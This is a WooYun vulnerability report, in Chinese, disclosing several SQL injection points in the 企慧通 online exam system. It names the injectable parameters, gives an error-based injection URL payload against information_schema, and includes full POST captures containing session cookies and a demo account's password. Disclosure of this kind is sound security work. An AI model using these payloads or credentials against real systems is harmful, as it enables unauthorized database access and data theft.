当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144585

漏洞标题:企慧通在线考试系统多处SQL注射

相关厂商:深圳市标驰信息技术有限公司

漏洞作者: 路人甲

提交时间:2015-10-10 15:20

修复时间:2016-01-12 17:26

公开时间:2016-01-12 17:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-10: 细节已通知厂商并且等待厂商处理中
2015-10-14: 厂商已经确认,细节仅向厂商公开
2015-10-17: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-08: 细节向核心白帽子及相关领域专家公开
2015-12-18: 细节向普通白帽子公开
2015-12-28: 细节向实习白帽子公开
2016-01-12: 细节向公众公开

简要描述:

多处注入打包,官方demo测试

详细说明:

深圳市标驰信息技术有限公司的企慧通在线考试系统,用户包括大量政府单位和高校。

http://**.**.**.**/Reception/evaluation-1.html


之前已经有人提交过多次该系统的注入了,但是应该还存在遗漏,打包提交一次。
部分注入需要登录,但只需要普通用户的权限即可,并不是后台注入,
以官方demo为例测试
提供一个账号供登陆测试
账号:15098997852
密码:123456

http://study.**.**.**.**/


#1
浏览课程处,此处无需登录

http://study.**.**.**.**/Course/dk_ViewCourse.aspx?c=B692AA9D7FEAD46E&Type=Stu&psIdH=646&cIdH=154


psIdH参数存在注入

A.png


QQ图片20151003000340.png


#2
查看练习试题处
http://study.**.**.**.**/myPaper/ViewExerciseSel.aspx?ModuleID=162&rId=21
rld参数存在注入,此处注入需要登录

http://study.**.**.**.**/myPaper/ViewExerciseSel.aspx?ModuleID=162&rId=21%20and%20(select%20count(*)%20from%20(select%201%20union%20select%20null%20union%20select%20!1)x%20group%20by%20concat((select%20table_name%20from%20information_schema.tables%20limit%201),floor(rand(0)*2)))


3.png


#3
#1 发起投票处存在注入
此处注入需要登陆

http://study.**.**.**.**/Vote/vAdd_Vote.aspx?ModuleID=31


POST /Vote/vAdd_Vote.aspx?ModuleID=31 HTTP/1.1
Host: study.**.**.**.**
Proxy-Connection: keep-alive
Content-Length: 636
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://study.**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://study.**.**.**.**/Vote/vAdd_Vote.aspx?ModuleID=31
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4,ja;q=0.2
Cookie: sgsa_id=**.**.**.**|1441692549271083; LXB_REFER=**.**.**.**; LiveWSDBT73926065=1441692559880718124276; LiveWSDBT73926065sessionid=1441692559880718124276; ASP.NET_SessionId=3gq10xdtwpqpqh5p2bze4i04; szUserInfo=uId=6025C5F00520D3C6&uName=F3DEC7776B9D23B497D322F83E773949&uPassWord=B137572BCC214989C48C866A48F8D0024DB9A335AE09E08E&uRealName=AD8F4C218FBAAB1D&uSex=F5ACD9DD2127E3B9&uAge=&uPhone=F3DEC7776B9D23B497D322F83E773949&rId=69B29965B4C7F549&sId=1ADB017EEAE7AB72&companyId=1ADB017EEAE7AB72&uMood=&uImgMax=79F4FF0090863D0D9B9BAEAFAB9469AE8497308CBB24A508&uImgMin=79F4FF0090863D0D22FEB220CCA1D542100CFFE0D6148F04&uDateTime=E5A55D7D7FF53B2B8B8C562F0F0FDD841FD2CBE1E0C1BAC5&uLoginTime=E5A55D7D7FF53B2B7B02667882BF3D5F43EFE4E52D3FE1DD&uJiFen=54B3330154E68331; sgsa_vt_176817_181449=1441719769327; Hm_lvt_dbb1c44cf6881a3b6d28b7fcd3c5bd0e=1441692549; Hm_lpvt_dbb1c44cf6881a3b6d28b7fcd3c5bd0e=1441719770; AutoLoginOut=LoginTime=2015-9-8 21:53:26
__VIEWSTATE=%2FwEPDwULLTIxNDQzNTYzMzhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQhiZ2NTaG93MQUIYmdjU2hvdzKQF%2FWlqHeKXO71IeLzK1mXQlAjqtqEqqdnYDQlY0WKdQ%3D%3D&__VIEWSTATEGENERATOR=B8C99DC4&__EVENTVALIDATION=%2FwEWEwK76%2BLUBgKd1sMYAqr6yuwFAqCv8sgJAvHqy4gIAtaBrvMNAs%2FzmIkLArSK%2B3MChcbUsw8C6ty2ngUCk%2BL%2BhwUC%2BPjg8goCoK%2Bylg4CpuHQigwC6cz33gQCgIDczQkCgICoYQLoqPvEBwKOg%2BWfAyP%2F%2FeGxHqVgfWw56cE%2FWmSkFzBAVITBKwCp5QpVtbXF&topic=qqq&intro=&answer1=q&answer2=qqq&answer3=qq&answer4=&answer5=&answer6=&answer7=&answer8=&answer9=&answer10=&type=1&bgEnd=2015-10-06+21%3A52%3A23&bgcShow=bgcShow1&bgSubmit=%E5%A2%9E%E5%8A%A0&bgMsg=


bgEnd参数存在注入

QQ图片20151003001042.png


#4
积分查询处
http://study.**.**.**.**/JiFen/sel_jf_xx.aspx?userID=259&ModuleID=130
随便选取开始和结束时间,点击查看后抓包。post数据包

POST /JiFen/sel_jf_xx.aspx?userID=259&ModuleID=130 HTTP/1.1
Host: study.**.**.**.**
Proxy-Connection: keep-alive
Content-Length: 489
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://study.**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://study.**.**.**.**/JiFen/sel_jf_xx.aspx?userID=259&ModuleID=130
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4,ja;q=0.2
Cookie: sgsa_id=**.**.**.**|1441692549271083; LiveWSDBT73926065=1441692559880718124276; ASP.NET_SessionId=3gq10xdtwpqpqh5p2bze4i04; sgsa_vt_176817_181449=1441728787544; Hm_lvt_dbb1c44cf6881a3b6d28b7fcd3c5bd0e=1441692549,1441728778,1441728788; Hm_lpvt_dbb1c44cf6881a3b6d28b7fcd3c5bd0e=1441728788; LXB_REFER=**.**.**.**; szUserInfo=uId=6025C5F00520D3C6&uName=F3DEC7776B9D23B497D322F83E773949&uPassWord=B137572BCC214989C48C866A48F8D0024DB9A335AE09E08E&uRealName=66C857DD5BE9F653&uSex=F5ACD9DD2127E3B9&uAge=&uPhone=F3DEC7776B9D23B497D322F83E773949&rId=69B29965B4C7F549&sId=1ADB017EEAE7AB72&companyId=1ADB017EEAE7AB72&uMood=&uImgMax=79F4FF0090863D0D9B9BAEAFAB9469AE8497308CBB24A508&uImgMin=79F4FF0090863D0D22FEB220CCA1D542100CFFE0D6148F04&uDateTime=E5A55D7D7FF53B2B8B8C562F0F0FDD841FD2CBE1E0C1BAC5&uLoginTime=E5A55D7D7FF53B2BDD8536829BBE4CECA23A8A85BABB7EB0&uJiFen=54B3330154E68331; AutoLoginOut=LoginTime=2015-9-9 23:56:17
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTExMjI0OTE1NDAPZBYCAgMPZBYCAgQPFgIeC18hSXRlbUNvdW50ZmRkZhWal3H0Eav49H6ca6poRgDYNHe9bZyfJsVhu4G309c%3D&__VIEWSTATEGENERATOR=048F3053&__EVENTVALIDATION=%2FwEWCQLsmK7aAwKWmvmbBAKx9J3vBgK8363BAgLH0vaKCgKxmbWVDAKM54rGBgLQ8YSoDwLKlbmzAaiFktavBE93isuxRnuz4Ur5d8CxIxjfbXIemwgaV6qR&DropDownList1=%E7%A7%AF%E5%88%86%E5%8A%A0%E5%87%8F&starc=2015-09-03+23%3A57%3A11&end=2015-09-29+23%3A57%3A14&Button1=%E6%9F%A5%E7%9C%8B&hiddenfield=


starc和end参数是刚才选取的·时间,此参数存在注入

C.png


D.png


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-10-14 17:25

厂商回复:


CNVD确认所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无